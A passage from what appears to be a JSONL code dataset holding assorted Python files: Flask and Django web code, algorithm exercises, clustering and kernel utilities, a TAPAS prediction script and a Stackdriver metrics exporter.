'thankyou']).delete()\n Switch.objects.filter(name='gengosystem').delete()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('base', '0001_initial'),\n ('waffle', '0001_initial'),\n ]\n\n operations = [\n migrations.RunPython(make_waffles, remove_waffles),\n ]\n","sub_path":"fjord/base/migrations/0002_make_waffles.py","file_name":"0002_make_waffles.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"534622297","text":"from flask import (\n Blueprint, request\n)\nimport flask\nimport json\nfrom integrated_api import postgres, utils, googleCalendar\n\n\nbp = Blueprint('api_v2', __name__, url_prefix='/api/v2')\n\n@bp.route('/calendars/', methods=['POST', 'DELETE', 'PUT', 'GET'])\ndef calendars():\n try:\n requestBody = utils.getJSONBody(request.get_data(as_text=True))\n if(request.method in ('POST', 'DELETE', 'PUT')):\n if (len(requestBody) == 0):\n return \"Error, you use POST, DELETE or PUT method but data empty. Check API documentation\"\n else:\n if(request.method=='POST'):\n summary = requestBody.get('summary', None)\n if(summary):\n timeZone = requestBody.get('time_zone', None)\n if(timeZone):\n created_calendar = googleCalendar.createCalendar(summary, timeZone)\n else:\n created_calendar = googleCalendar.createCalendar(summary)\n data = {\n 'calendar_id' : created_calendar['id'],\n 'calendar_name' : created_calendar['summary'],\n 'platform_id': 'Google Calendar'\n }\n data = postgres.upsertCalendar(data)\n data = json.dumps(created_calendar, default=str)\n else:\n return \"Error, creating calendar need summary and timezone\"\n elif (request.method in ('DELETE', 'PUT')):\n calendarID = requestBody.get('id', None)\n if(calendarID):\n if(request.method=='DELETE'):\n edited_calendar = googleCalendar.deleteCalendar(calendarID)\n edited_calendar = postgres.deleteCalendar(calendarID)\n elif(request.method=='PUT'):\n edited_calendar = googleCalendar.updateCalendar(data=requestBody)\n else:\n return \"Error, unrecognized request method\"\n data = json.dumps(edited_calendar, default=str)\n else:\n return \"Error, deleting or updatingcalendar need calendar ID\"\n else:\n data = json.dumps(googleCalendar.listCalendar(), default=str)\n response = flask.Response(data)\n response.headers = {\n 'Access-Control-Allow-Origin': '*',\n 'Content-Type': 'application/json'\n }\n return response\n except Exception as e:\n errormessage = utils.customError(\"calendars\", e)\n return errormessage\n\n@bp.route('/scheduled_events/', methods=['POST', 'PATCH', 'PUT', 'GET'])\ndef scheduled_events():\n try:\n requestBody = utils.getJSONBody(request.get_data(as_text=True))\n if (request.method in ('POST', 'DELETE', 'PUT')):\n if (len(requestBody) == 0):\n return \"Error, you use POST, DELETE or PUT method but data empty. 
Check API documentation\"\n else:\n eventID = requestBody.get('event_id', None)\n if (eventID):\n if(request.method=='POST'):\n data = googleCalendar.upsertEvent(requestBody)\n data = json.dumps(data, default=str)\n response = flask.Response(data)\n response.headers = {\n 'Access-Control-Allow-Origin': '*',\n 'Content-Type': 'application/json'\n }\n return response\n elif (request.method in ('PATCH', 'PUT')):\n status = requestBody.get('status', None)\n if(status in ('U', 'C')):\n data = googleCalendar.upsertEvent(requestBody, status)\n data = json.dumps(data, default=str)\n response = flask.Response(data)\n response.headers = {\n 'Access-Control-Allow-Origin': '*',\n 'Content-Type': 'application/json'\n }\n return response\n else:\n return \"Error, status update should be in 'U' for update and 'C' for cancel\"\n else:\n return \"Error, event ID is required.\"\n else:\n pass\n except Exception as e:\n errormessage = utils.customError(\"scheduled_events\", e)\n return errormessage\n\n@bp.route('/persons/', methods=['GET'])\ndef retrieve_person(personID):\n try:\n\n if (personID):\n data = postgres.listPerson(personID=personID)\n else:\n data = None\n data = json.dumps(data, default=str)\n response = flask.Response(data)\n response.headers = {\n 'Access-Control-Allow-Origin': '*',\n 'Content-Type': 'application/json'\n }\n return response\n except Exception as e:\n errormessage = utils.customError(\"list-event\", e)\n return errormessage\n\n@bp.route('/persons/', methods=['GET', 'POST', 'PUT'])\ndef persons():\n try:\n print(request.method)\n print(request.args.get('personID', None))\n requestBody = utils.getJSONBody(request.get_data(as_text=True))\n if(request.method in ('POST', 'PUT')):\n if(len(requestBody)<=0):\n return \"Error, you use POST or PATCH method but data empty. 
Check API documentation\"\n if request.method == 'POST':\n if(requestBody.get('person_id',None)):\n del requestBody['person_id']\n data = json.dumps(postgres.upsertPerson(data=requestBody), default=str)\n else:\n print(request.method)\n personID = request.args.get('personID', None)\n print(personID)\n if (personID):\n data = json.dumps(postgres.listPerson(personID=personID), default=str)\n else:\n data = json.dumps(postgres.listPerson(), default=str)\n response = flask.Response(data)\n response.headers = {\n 'Access-Control-Allow-Origin': '*',\n 'Content-Type': 'application/json'\n }\n return response\n except Exception as e:\n errormessage = utils.customError(\"persons\", e)\n return errormessage\n","sub_path":"integrated_api/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":6595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"238615303","text":"class Solution(object):\n def coinChange(self, coins, amount):\n n = len(coins)\n \n # dp is a 2d array with dimension n x (amount + 1)\n # dp[i][j] is the fewest number of coins to change j cents using coins[0], coins[1]...coins[i]\n dp = [[sys.maxint] * (amount + 1) for _ in range(n)]\n\n\n for i in range(n):\n #always need 0 coins for changing 0 cents\n dp[i][0] = 0\n \n for j in range(1, amount + 1):\n if j - coins[i] >= 0:\n dp[i][j] = min(dp[i - 1][j], dp[i][j - coins[i]] + 1)\n elif i > 0:\n dp[i][j] = dp[i - 1][j]\n \n return dp[n - 1][amount] if dp[n - 1][amount] != sys.maxint else -1\n","sub_path":"algorithms/CoinChangeI/CoinChangeI.py","file_name":"CoinChangeI.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"636568103","text":"from pum.core.deltapy import DeltaPy\nimport os\n\nclass RecreateViewsAndFunctions(DeltaPy):\n\n def run(self):\n\n delta_dir = self.delta_dir\n\n self.write_message(\"Reloading views and functions\")\n\n views_sh = \"PGSERVICE=qwat_test SRID=21781 {}../../ordinary_data/views/rewrite_views.sh\".format(self.delta_dir)\n functions_sh = \"PGSERVICE=qwat_test SRID=21781 {}../../ordinary_data/functions/rewrite_functions.sh\".format(self.delta_dir)\n\n # Execute commands\n os.system(views_sh)\n os.system(functions_sh)\n","sub_path":"update/delta/post-all.py","file_name":"post-all.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"516048314","text":"# -*- coding: utf-8 -*-\r\nS=str() #产生空字符串\r\n\r\nst='hello word!'\r\nz1=st.find('he',0,len(st)) #返回包含子串的开始索引位置,否则-1\r\nz2=st.find('he',1,len(st))\r\nprint(z1,z2)\r\n\r\nstt=st.replace('or','kl') #原来的st不变\r\nprint(stt)\r\nprint(st)\r\n\r\nst1='joh'\r\nst2=st1+' '+st\r\nprint(st2)\r\n\r\nstr1='jo'\r\nstr2='qb'\r\nstr3='qb'\r\ns1=str1!=str2\r\ns2=str2==str3\r\nprint(s1,s2)\r\n\r\n\r\n","sub_path":"程序与数据/第1章 Python基础知识/1.5.3.py","file_name":"1.5.3.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"156233062","text":"N = list(map(int, input().split()))\n\nK = list(map(int, input().split()))\n\n# 상품 값을 내림차순으로 정렬\nK.sort(reverse=True)\n\n# 최소한으로 구매 가능한 비싼 상품의 개수를 카운트하는 변수\ncount = 0\n\n# 가장 큰 상품의 값 순서대로 K[i]를 구매가능하면 count를 올리고, N[1] < K[i]라면 그냥 지나간다.\nfor i in range(len(K)) :\n if N[1] >= K[i] :\n N[1] = N[1] - K[i]\n count += 1\n else :\n continue\n# 살 수 있는 상품이 하나도 없었다면 0을 출력한다.\nif count == 0 :\n print(0)\nelse :\n 
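# count now holds how many of the priciest items fit within the budget when bought greedily from the descending sort\n    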
print(count)","sub_path":"3주차/노하람/(구간 합)재벌의 쇼핑.py","file_name":"(구간 합)재벌의 쇼핑.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"621463395","text":"\nimport csv\n\ndef read_tab_sep():\n inpfile=open(\"input_tab_sep.txt\",'r')\n inp_reader=csv.reader(inpfile, delimiter='\\t')\n for row in inp_reader:\n print (row)\n print (row[0])\n\n#read_tab_sep()\n\ndef read_space_sep():\n inpfile=open(\"input_space_sep.txt\",'r')\n inp_reader=csv.reader(inpfile, delimiter=' ')\n for row in inp_reader:\n print (row)\n print (row[0])\n\n\n#read_space_sep()\n\ndef read_comma_sep():\n inpfile=open(\"input_comma_sep.txt\",'r')\n inp_reader=csv.reader(inpfile, delimiter=\",\", quotechar=\"'\")\n for row in inp_reader:\n print (row)\n print (row[0])\n\n\nread_comma_sep()","sub_path":"new_pract/read_tab_sep.py","file_name":"read_tab_sep.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"178629246","text":"import tensorflow.compat.v1 as tf\nimport os \nimport shutil\nimport csv\nimport pandas as pd\nimport IPython\n\nprint(\"1\")\n\ntf.get_logger().setLevel('ERROR')\n\nfrom tapas.utils import tf_example_utils\nfrom tapas.protos import interaction_pb2\nfrom tapas.utils import number_annotation_utils\nfrom tapas.scripts import prediction_utils\n\nprint(\"2\")\n\nos.makedirs('results/sqa/tf_examples', exist_ok=True)\nos.makedirs('results/sqa/model', exist_ok=True)\nwith open('results/sqa/model/checkpoint', 'w') as f:\n f.write('model_checkpoint_path: \"model.ckpt-0\"')\nfor suffix in ['.data-00000-of-00001', '.index', '.meta']:\n shutil.copyfile(f'tapas_sqa_base/model.ckpt{suffix}', f'results/sqa/model/model.ckpt-0{suffix}')\n\n\nprint(\"3\")\n\nmax_seq_length = 512\nvocab_file = \"tapas_sqa_base/vocab.txt\"\nconfig = tf_example_utils.ClassifierConversionConfig(\n vocab_file=vocab_file,\n max_seq_length=max_seq_length,\n max_column_id=max_seq_length,\n max_row_id=max_seq_length,\n strip_column_names=False,\n add_aggregation_candidates=False,\n)\nconverter = tf_example_utils.ToClassifierTensorflowExample(config)\n\nprint(\"4\")\n\ndef convert_interactions_to_examples(tables_and_queries):\n \"\"\"Calls Tapas converter to convert interaction to example.\"\"\"\n for idx, (table, queries) in enumerate(tables_and_queries):\n interaction = interaction_pb2.Interaction()\n for position, query in enumerate(queries):\n question = interaction.questions.add()\n question.original_text = query\n question.id = f\"{idx}-0_{position}\"\n for header in table[0]:\n interaction.table.columns.add().text = header\n for line in table[1:]:\n row = interaction.table.rows.add()\n for cell in line:\n row.cells.add().text = cell\n number_annotation_utils.add_numeric_values(interaction)\n for i in range(len(interaction.questions)):\n try:\n yield converter.convert(interaction, i)\n except ValueError as e:\n print(f\"Can't convert interaction: {interaction.id} error: {e}\")\n \ndef write_tf_example(filename, examples):\n with tf.io.TFRecordWriter(filename) as writer:\n for example in examples:\n writer.write(example.SerializeToString())\n\ndef predict(table_data, queries):\n print(\"5\")\t\n table = [list(map(lambda s: s.strip(), row.split(\"|\"))) \n for row in table_data.split(\"\\n\") if row.strip()]\n examples = convert_interactions_to_examples([(table, queries)])\n write_tf_example(\"results/sqa/tf_examples/test.tfrecord\", examples)\n 
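# the SQA task runner appears to also look for a dev split file; an empty one seems to be enough for prediction-only runs\n    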
write_tf_example(\"results/sqa/tf_examples/random-split-1-dev.tfrecord\", [])\n print(\"6\")\n os.system(''' python tapas/tapas/run_task_main.py \\\n --task=\"SQA\" \\\n --output_dir=\"results\" \\\n --noloop_predict \\\n --test_batch_size=3 \\\n --tapas_verbosity=\"ERROR\" \\\n --compression_type= \\\n --init_checkpoint=\"tapas_sqa_base/model.ckpt\" \\\n --bert_config_file=\"tapas_sqa_base/bert_config.json\" \\\n --mode=\"predict\" 2> error''')\n\n\n\n results_path = \"results/sqa/model/test_sequence.tsv\"\n all_coordinates = []\n df = pd.DataFrame(table[1:], columns=table[0])\n #display(IPython.display.HTML(df.to_html(index=False)))\n print(\"7\")\n with open(results_path) as csvfile:\n reader = csv.DictReader(csvfile, delimiter='\\t')\n for row in reader:\n coordinates = prediction_utils.parse_coordinates(row[\"answer_coordinates\"])\n all_coordinates.append(coordinates)\n answers = ', '.join([table[row + 1][col] for row, col in coordinates])\n position = int(row['position'])\n print(\">\", queries[position])\n print(answers)\n return all_coordinates\n\n\n\n# Example nu-1000-0\nresult = predict(\"\"\"\nPos | No | Driver | Team | Laps | Time/Retired | Grid | Points\n1 | 32 | Patrick Carpentier | Team Player's | 87 | 1:48:11.023 | 1 | 22 \n2 | 1 | Bruno Junqueira | Newman/Haas Racing | 87 | +0.8 secs | 2 | 17 \n3 | 3 | Paul Tracy | Team Player's | 87 | +28.6 secs | 3 | 14\n4 | 9 | Michel Jourdain, Jr. | Team Rahal | 87 | +40.8 secs | 13 | 12\n5 | 34 | Mario Haberfeld | Mi-Jack Conquest Racing | 87 | +42.1 secs | 6 | 10\n6 | 20 | Oriol Servia | Patrick Racing | 87 | +1:00.2 | 10 | 8 \n7 | 51 | Adrian Fernandez | Fernandez Racing | 87 | +1:01.4 | 5 | 6\n8 | 12 | Jimmy Vasser | American Spirit Team Johansson | 87 | +1:01.8 | 8 | 5\n9 | 7 | Tiago Monteiro | Fittipaldi-Dingman Racing | 86 | + 1 Lap | 15 | 4\n10 | 55 | Mario Dominguez | Herdez Competition | 86 | + 1 Lap | 11 | 3\n11 | 27 | Bryan Herta | PK Racing | 86 | + 1 Lap | 12 | 2\n12 | 31 | Ryan Hunter-Reay | American Spirit Team Johansson | 86 | + 1 Lap | 17 | 1\n13 | 19 | Joel Camathias | Dale Coyne Racing | 85 | + 2 Laps | 18 | 0\n14 | 33 | Alex Tagliani | Rocketsports Racing | 85 | + 2 Laps | 14 | 0\n15 | 4 | Roberto Moreno | Herdez Competition | 85 | + 2 Laps | 9 | 0\n16 | 11 | Geoff Boss | Dale Coyne Racing | 83 | Mechanical | 19 | 0\n17 | 2 | Sebastien Bourdais | Newman/Haas Racing | 77 | Mechanical | 4 | 0\n18 | 15 | Darren Manning | Walker Racing | 12 | Mechanical | 7 | 0\n19 | 5 | Rodolfo Lavin | Walker Racing | 10 | Mechanical | 16 | 0\n\"\"\", [\"what were the team names?\",\n \"of these, which points did Mario Haberfeld and Oriol Servia score?\",\n \"who scored 2?\"])\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"286104586","text":"from spider.download_course_w3school import DownloadW3School\nurl=\"https://www.w3school.com.cn/html/index.asp\"\nspider=DownloadW3School(url)\n# print(spider.is_in_limit(\"https://www.w3school.com.cn/html/html_comments.asp\"))\n# print(spider.is_in_limit(\"https://www.w3school.com.cn/tags/index.asp\"))\nspider.get_catlog()\n# content=spider.get_page_content(\"https://www.w3school.com.cn/html/html_jianjie.asp\")\n# print(content)\nprint(spider.catlogDictList)\ncatlogList=spider.catlogDictList\nfor category in catlogList:\n print(category)\n for categoryName, urlTupleList in category.items():\n print(categoryName)\n for title, url in urlTupleList:\n 
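# each tuple pairs a section title with its page URL, as collected in catlogDictList\n            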
print(title,url)\n\nspider.start_download()\n#5df779c098f10fedd651be64","sub_path":"test/spider/test_w3school.py","file_name":"test_w3school.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"571351628","text":"import numpy as np\nfrom math import *\n\n\n# Partitional Clustering\nX = [(0, 5), (1, 3), (2, 4), (6, 2), (7, 0), (8, 3), (9, 1)]\ndist = lambda x, y: sqrt((x[0] - y[0])**2 + (x[1] - y[1])**2)\n\ndef median(xs):\n xs = np.array(xs)\n n = xs.shape[0]\n if n % 2:\n return tuple(xs[n // 2, :])\n else:\n return tuple((xs[n // 2 - 1, :] + xs[n // 2, :]) / 2)\n\n\nm = [(4, 2), (11, 3)]\n\nn = 5\nfor i in range(n):\n clusters = [[] for _ in range(len(m))]\n for j, x in enumerate(X):\n dm = [dist(mx, x) for mx in m]\n \n if dm[0] < dm[1]:\n bold1, bold2 = r'\\textbf', ''\n c = 0\n else:\n bold1, bold2 = '', r'\\textbf'\n c = 1\n\n clusters[c].append(x)\n print(f'\\item $p_{j+1}$ {bold1}{{distance to {m[0]}: {dm[0]:.3f}}}; {bold2}{{distance to {m[1]}: {dm[1]:.6f}}}')\n\n changed = False\n for c, cl in enumerate(clusters):\n print(f'$C_{c}$ points: \\{{{\", \".join(map(str, cl))}\\}}')\n # med = tuple([median(x) for x in cl])\n med = median(cl)\n print(f'$C_{c}$ median: {med}')\n if med != m[c]:\n changed = True\n m[c] = med\n\n if not changed:\n print(\"No medians changed.\")\n print(\"Algorithm finished after\", i, \"iterations.\")\n print(\"Medians:\")\n print(m)\n break\n\n print()","sub_path":"comp4211/problem-set/q6.py","file_name":"q6.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"301775324","text":"import numpy as np\nfrom check_data_compatibility import *\n\nclass ChiSquare:\n\n\t\"\"\"\n\tThis is a class of evaluating the chi-square kernel function.\n\n\tAttributes\n\t----------\n\tdata : numpy.ndarray\n\t\tThe array at which the chi-square kernel function is to evaluated.\n\tN, d : int, int\n\t\tThe shape of data array.\n\n\tMethods\n\t-------\n\tkernel_matrix(new_data)\n\t\tEvaluates the chi-square kernel function at new_data.\n\n\tkernel_single_eval(new_data)\n\t\tEvaluates the chi-square kernel function at new_data involving double `for` loops;\n\t\tless efficient than self.kernel_matrix.\n\t\n\tReference\n\t---------\n\tVedaldi, Andrea, and Andrew Zisserman. 2012. 
“Efficient Additive Kernels via Explicit Feature Maps.”\n\t\tIEEE Transactions on Pattern Analysis and Machine Intelligence 34 (3): 480–92.\n\n\t\"\"\"\n\t\n\tdef __init__(self, data):\n\t\t\n\t\t\"\"\"\n\t\tParameters\n\t\t----------\n\t\tdata : numpy.ndarray\n\t\t\tThe array at which the chi-square kernel function is to evaluated.\n\t\t\n\t\t\"\"\"\n\t\t\n\t\tif not isinstance(data, np.ndarray):\n\t\t\tdata = np.array(data)\n\t\t\n\t\tif len(data.shape) == 1:\n\t\t\tdata = data.reshape(-1, 1)\n\t\t\n\t\tself.data = data\n\t\tself.N, self.d = self.data.shape\n\t\n\tdef kernel_matrix(self, new_data):\n\t\t\n\t\t\"\"\"\n\t\tEvaluates the chi-square kernel function at new_data.\n\t\tEach entry is k(X_i, Y_j), where X_i corresponds to the i-th row of data,\n\t\tY_j corresponds to the j-th row of new_data.\n\n\t\tParameters\n\t\t----------\n\t\tnew_data : numpy.ndarray\n\t\t\tThe array at which the chi-square kernel function is to evaluated.\n\n\t\tReturns\n\t\t-------\n\t\tnumpy.ndarray\n\t\t\tThe array of chi-square kernel function evaluations.\n\n\t\t\"\"\"\n\t\t\n\t\tif not isinstance(new_data, np.ndarray):\n\t\t\tnew_data = np.array(new_data)\n\t\t\n\t\tif len(new_data.shape) == 1:\n\t\t\tnew_data = new_data.reshape(-1, 1)\n\t\t\n\t\tn, d1 = new_data.shape\n\t\t\n\t\tcheck_data_compatibility(self.data, new_data)\n\t\t\n\t\ttiled_data = np.tile(new_data, self.N).reshape(1, -1)\n\t\ttiled_land = np.tile(self.data.reshape(1, -1), n)\n\t\t\n\t\tprod1 = tiled_data * tiled_land\n\t\tsum1 = tiled_data + tiled_land\n\t\t\n\t\tpower = 2. * np.sum(np.vstack(np.split(prod1 / sum1, self.N * n, axis=1)), axis=1)\n\t\toutput = power.reshape(n, self.N)\n\t\t\n\t\treturn output.T\n\t\n\tdef kernel_single_eval(self, new_data):\n\t\t\n\t\t\"\"\"\n\t\tEvaluates the chi-square kernel function at new_data involving double `for` loops.\n\t\tThis approach is less efficient comparing to self.kernel_matrix.\n\t\tEach entry is k(X_i, Y_j), where X_i corresponds to the i-th row of data,\n\t\tY_j corresponds to the j-th row of new_data.\n\n\t\tParameters\n\t\t----------\n\t\tnew_data : numpy.ndarray\n\t\t\tThe array at which the chi-square kernel function is to evaluated.\n\n\t\tReturns\n\t\t-------\n\t\tnumpy.ndarray\n\t\t\tThe array of chi-square kernel function evaluations.\n\n\t\t\"\"\"\n\t\t\n\t\tif not isinstance(new_data, np.ndarray):\n\t\t\tnew_data = np.array(new_data)\n\t\t\n\t\tif len(new_data.shape) == 1:\n\t\t\tnew_data = new_data.reshape(-1, 1)\n\t\t\t\n\t\tn, d1 = new_data.shape\n\t\t\n\t\tcheck_data_compatibility(self.data, new_data)\n\t\t\n\t\toutput = np.zeros((self.N, n), dtype=np.float64)\n\t\t\n\t\tfor i in range(self.N):\n\t\t\tfor j in range(n):\n\t\t\t\ts = 0\n\t\t\t\tfor k in range(self.d):\n\t\t\t\t\ts += 2. 
* self.data[i][k] * new_data[j][k] / (self.data[i][k] + new_data[j][k])\n\t\t\t\t\n\t\t\t\toutput[i][j] = s\n\t\t\t\t\n\t\treturn output\n\n\nif __name__ == '__main__':\n\t\n\tdata1 = np.random.randn(500 * 3).reshape(500, 3)\n\tnew_data1 = np.random.randn(1000 * 3).reshape(1000, 3)\n\tkernel = ChiSquare(data1)\n\tk1 = kernel.kernel_matrix(new_data1)\n\tk2 = kernel.kernel_single_eval(new_data1)\n\tprint(np.allclose(k1, k2))\n\t\n\tdata2 = np.random.randn(500)\n\tnew_data2 = np.random.randn(1000)\n\tkernel = ChiSquare(data2)\n\tk3 = kernel.kernel_matrix(new_data2)\n\tk4 = kernel.kernel_single_eval(new_data2)\n\tprint(np.allclose(k3, k4))\n","sub_path":"chisq.py","file_name":"chisq.py","file_ext":"py","file_size_in_byte":3671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"365485443","text":"# Copyright 2019 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\n`stackdriver.py`\nStackdriver Monitoring exporter class.\n\"\"\"\nimport logging\nimport google.api_core.exceptions\nfrom google.cloud import monitoring_v3\n\nLOGGER = logging.getLogger(__name__)\nDEFAULT_METRIC_TYPE = \"custom.googleapis.com/error_budget_burn_rate\"\nDEFAULT_METRIC_DESCRIPTION = (\"Speed at which the error budget for a given \"\n                              \"aggregation window is consumed\")\n\n\nclass 
StackdriverExporter:\n \"\"\"Stackdriver Monitoring exporter class.\"\"\"\n\n def __init__(self):\n self.client = monitoring_v3.MetricServiceClient()\n\n def export(self, data, **config):\n \"\"\"Export data to Stackdriver Monitoring.\n\n Args:\n data (dict): Data to send to Stackdriver Monitoring.\n config (dict): Stackdriver Monitoring metric config.\n project_id (str): Stackdriver host project id.\n custom_metric_type (str): Custom metric type.\n custom_metric_unit (str): Custom metric unit.\n\n Returns:\n object: Stackdriver Monitoring API result.\n \"\"\"\n if not self.get_metric_descriptor(**config):\n self.create_metric_descriptor(**config)\n self.create_timeseries(data, **config)\n\n def create_timeseries(self, data, **config):\n \"\"\"Create Stackdriver Monitoring timeseries.\n\n Args:\n data (dict): Data to send to Stackdriver Monitoring.\n config (dict): Metric config.\n\n Returns:\n object: Metric descriptor.\n \"\"\"\n series = monitoring_v3.types.TimeSeries()\n series.metric.type = config.get('metric_type', DEFAULT_METRIC_TYPE)\n\n # Write timeseries metric labels.\n series.metric.labels['error_budget_policy_step_name'] = str(\n data['error_budget_policy_step_name'])\n series.metric.labels['window'] = str(data['window'])\n series.metric.labels['service_name'] = data['service_name']\n series.metric.labels['feature_name'] = data['feature_name']\n series.metric.labels['slo_name'] = data['slo_name']\n series.metric.labels['alerting_burn_rate_threshold'] = str(\n data['alerting_burn_rate_threshold'])\n\n # Use the generic resource 'global'.\n series.resource.type = 'global'\n series.resource.labels['project_id'] = config['project_id']\n\n # Create a new data point.\n point = series.points.add()\n\n # Define end point timestamp.\n timestamp = data['timestamp']\n point.interval.end_time.seconds = int(timestamp)\n point.interval.end_time.nanos = int(\n (timestamp - point.interval.end_time.seconds) * 10**9)\n\n # Set the metric value.\n point.value.double_value = data['error_budget_burn_rate']\n\n # Record the timeseries to Stackdriver Monitoring.\n project = self.client.project_path(config['project_id'])\n result = self.client.create_time_series(project, [series])\n labels = series.metric.labels\n LOGGER.debug(\n f\"timestamp: {timestamp} burnrate: {point.value.double_value}\"\n f\"{labels['service_name']}-{labels['feature_name']}-\"\n f\"{labels['slo_name']}-{labels['error_budget_policy_step_name']}\")\n return result\n\n def get_metric_descriptor(self, **config):\n \"\"\"Get Stackdriver Monitoring metric descriptor.\n\n Args:\n config (dict): Metric config.\n\n Returns:\n object: Metric descriptor (or None if not found).\n \"\"\"\n name = config.get('metric_type', DEFAULT_METRIC_TYPE)\n descriptor = self.client.metric_descriptor_path(config['project_id'],\n name)\n try:\n return self.client.get_metric_descriptor(descriptor)\n except google.api_core.exceptions.NotFound:\n return None\n\n def create_metric_descriptor(self, **config):\n \"\"\"Create Stackdriver Monitoring metric descriptor.\n\n Args:\n config (dict): Metric config.\n\n Returns:\n object: Metric descriptor.\n \"\"\"\n project = self.client.project_path(config['project_id'])\n descriptor = monitoring_v3.types.MetricDescriptor()\n descriptor.type = config.get('metric_type', DEFAULT_METRIC_TYPE)\n descriptor.metric_kind = (\n monitoring_v3.enums.MetricDescriptor.MetricKind.GAUGE)\n descriptor.value_type = (\n monitoring_v3.enums.MetricDescriptor.ValueType.DOUBLE)\n descriptor.description = 
config.get('metric_description',\n DEFAULT_METRIC_DESCRIPTION)\n self.client.create_metric_descriptor(project, descriptor)\n return descriptor\n","sub_path":"tools/slo-generator/slo_generator/exporters/stackdriver.py","file_name":"stackdriver.py","file_ext":"py","file_size_in_byte":5301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"232145473","text":"\"\"\"\n forms for event application\n\"\"\"\nfrom django import forms\nfrom django.contrib.auth.models import User\n\nfrom project_management.notifications.models import Event\n\nDATE_INPUT_FORMAT = '%m-%d-%Y'\nDATE_FIELD_ATTR = {'class': 'vDateField'}\n\n\nclass EventForm(forms.ModelForm):\n\n date = forms.DateField(\n input_formats=[DATE_INPUT_FORMAT],\n required=False,\n widget=forms.TextInput(\n attrs=DATE_FIELD_ATTR))\n\n def save(self, user, commit=True):\n \"\"\"\n Overriden save method to include creator and attendees in event\n \"\"\"\n event = super(EventForm, self).save(commit=False)\n event.creator = user\n if commit:\n event.save()\n for user in self.cleaned_data['attendees']:\n event.attendees.add(user)\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Overriden init method to filter only active users\n \"\"\"\n super(self.__class__, self).__init__(*args, **kwargs)\n self.fields['attendees'].queryset = User.objects.filter(\n is_active=True, is_staff=False).order_by('username')\n\n class Meta:\n model = Event\n fields = ('name', 'date', 'start_time', 'end_time', 'venue',\n 'location', 'project', 'type', 'attendees', 'description')\n","sub_path":"project_management/notifications/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"601650469","text":"from flask import Flask, render_template, abort\nfrom xml import etree\napp = Flask (__name__)\n\n@app.route('/')\ndef inicio():\n return render_template(\"inicio.html\")\n\n@app.route('/potencia//')\ndef potencia(base,exponente):\n try:\n base=int(base)\n exponente=int(exponente)\n except:\n abort(404)\n if exponente > 0:\n resultado = base**exponente\n elif exponente == 0:\n resultado = 1\n elif exponente < 0:\n resultado = 1/(base**abs(exponente))\n return render_template(\"potencia.html\",ba=base,ex=exponente,res=resultado)\n\n@app.route('/cuenta//')\ndef contar(cad1,cad2):\n if len(cad2) == 1:\n aparece = cad1.count(cad2)\n else:\n abort(404)\n return render_template(\"contar.html\",palabra=cad1,letra=cad2,apariciones=aparece)\n\n@app.route('/libro/')\ndef buscar(codigo):\n doc = etree.parse('libros.xml')\n if str(codigo) in doc.xpath(\"/biblioteca/libro/codigo/text()\"):\n titulo=doc.xpath(\"/biblioteca/libro[codigo/text()='%s']/titulo/text()\"%codigo)[0]\n autor=doc.xpath(\"/biblioteca/libro[codigo/text()='%s']/autor/text()\"%codigo)[0]\n else:\n abort(404)\n return render_template(\"buscar.html\",titulo=titulo,autor=autor)\n\napp.run(debug=True)\n","sub_path":"proyectoflask.py","file_name":"proyectoflask.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"322436534","text":"# Isaac Yep\n# Monty Hall simulator\n\nimport random\n\ntrial_iterations = int(input(\"How many trials would you like to simulate? 
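Editor's note on proyectoflask.py above: `from xml import etree` cannot work as written, because the stdlib `xml.etree` exposes neither a top-level `parse()` nor an `.xpath()` method; the calls in the `/libro/` route match lxml's API. A minimal sketch of the intended lookup, with inline XML standing in for the app's libros.xml (the document content here is illustrative):

```python
from lxml import etree

# stand-in for etree.parse('libros.xml')
doc = etree.fromstring(
    "<biblioteca>"
    "<libro><codigo>1</codigo><titulo>Quijote</titulo><autor>Cervantes</autor></libro>"
    "</biblioteca>"
)

codigo = "1"
if codigo in doc.xpath("/biblioteca/libro/codigo/text()"):
    titulo = doc.xpath("/biblioteca/libro[codigo/text()='%s']/titulo/text()" % codigo)[0]
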